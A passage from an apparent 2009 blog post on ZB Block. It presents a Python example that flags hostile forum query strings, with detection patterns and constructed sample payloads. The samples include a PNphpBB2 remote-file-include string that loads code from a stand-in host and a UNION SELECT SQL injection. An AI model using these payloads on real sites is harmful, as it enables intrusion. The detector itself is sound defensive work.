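# Constructed allow-list for this example; a real filter lists its own parameters.
ALLOWED_PARAMS = {"name", "file", "t", "p", "sid", "highlight", "start", "mode"}

MAX_DECODE_ROUNDS = 3  # %2527 -> %27 -> ' ; stop once a round changes nothing

# PHP fragments that have no place in a board URL: this example's reading of
# what the log calls a "General board attack".
PHP_FRAGMENT = re.compile(r"\$_(?:GET|POST|REQUEST)\s*\[|\binclude(?:_once)?\s*\(", re.IGNORECASE)
# A parameter whose value is itself a remote URL: the file-include payload.
REMOTE_URL = re.compile(r"^\s*https?://", re.IGNORECASE)
# The traits the MySQL post lists (/**/ glue, trailing /*, negative page number)
# plus the UNION ... SELECT that the glue joins together.
SQL_COMMENT_GLUE = re.compile(r"/\*\*/")
SQL_TRAILING_COMMENT = re.compile(r"/\*\s*$")
SQL_UNION_SELECT = re.compile(
    r"\bunion\b(?:\s|/\*.*?\*/)+(?:all(?:\s|/\*.*?\*/)+)?select\b", re.IGNORECASE)
NEGATIVE_NUMBER = re.compile(r"^-\d")

# Constructed samples modelled on the log entries above.
RFI_QUERY = ("name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=0123sid/"
             "&highlight=%27.include($_GET[a]),exit.%27"
             "&a=http://example.invalid/images/copyright%5B1%5D.txt????")
RFI_QUERY_DOUBLE_ENCODED = RFI_QUERY.replace("%27", "%2527")   # the attacker's retry
RFI_VIA_HIGHLIGHT = ("name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2"
                     "&file=viewtopic&p=34004/viewtopic.php?p=15&sid=0123sid/"
                     "&highlight=http://example.invalid/images/copyright%5B1%5D.txt????")
SQLI_QUERY = ("p=-1/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/"
              "0x30653763326137383538643038336566366365353233373433305317531753175317/*")
BENIGN_QUERY = "name=PNphpBB2&file=viewtopic&t=8&start=15"


def normalize(value: str) -> str:
    """Percent-decode repeatedly so double-encoded payloads are seen in the clear."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def score_query(raw_query: str):
    """Return (score, reasons) for one raw QUERY_STRING, one point per signature.

    The reason strings echo the wording of the log entries above; the matching
    rules are this example's reconstruction, not ZB Block's code.
    """
    reasons = []
    query = normalize(raw_query)
    pairs = parse_qsl(query, keep_blank_values=True)

    if PHP_FRAGMENT.search(query):
        reasons.append("General board attack")
    for name in dict.fromkeys(n for n, _ in pairs):          # unique names, in order
        if name not in ALLOWED_PARAMS:
            reasons.append(f"[{name}] does not belong in query")
    if "?" in raw_query:                                      # a literal, unencoded '?'
        reasons.append("Unescaped question mark in query")
    if any(REMOTE_URL.match(v) for _, v in pairs):
        reasons.append("Remote file include attack (http)")

    texts = [query] + [v for _, v in pairs]                   # whole string and each value
    sql_hit = any(SQL_COMMENT_GLUE.search(t) or SQL_TRAILING_COMMENT.search(t)
                  or SQL_UNION_SELECT.search(t) for t in texts)
    if sql_hit or any(n == "p" and NEGATIVE_NUMBER.match(v) for n, v in pairs):
        reasons.append("MySQL attack")
    return len(reasons), reasons


if __name__ == "__main__":
    for label, q in (("benign", BENIGN_QUERY), ("rfi", RFI_QUERY),
                     ("rfi double-encoded", RFI_QUERY_DOUBLE_ENCODED),
                     ("rfi via highlight", RFI_VIA_HIGHLIGHT), ("sqli", SQLI_QUERY)):
        score, reasons = score_query(q)
        print(f"{label}: score {score} {reasons}")
```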
ZB Block's signatures have been updated to adapt to this new threat, and updating them is critical!
Zap.
Edited on: Wednesday, March 25, 2009 12:54 AM Mountain Daylight Time
Categories: Exploit Bot, Scan Bot, Spam Bot
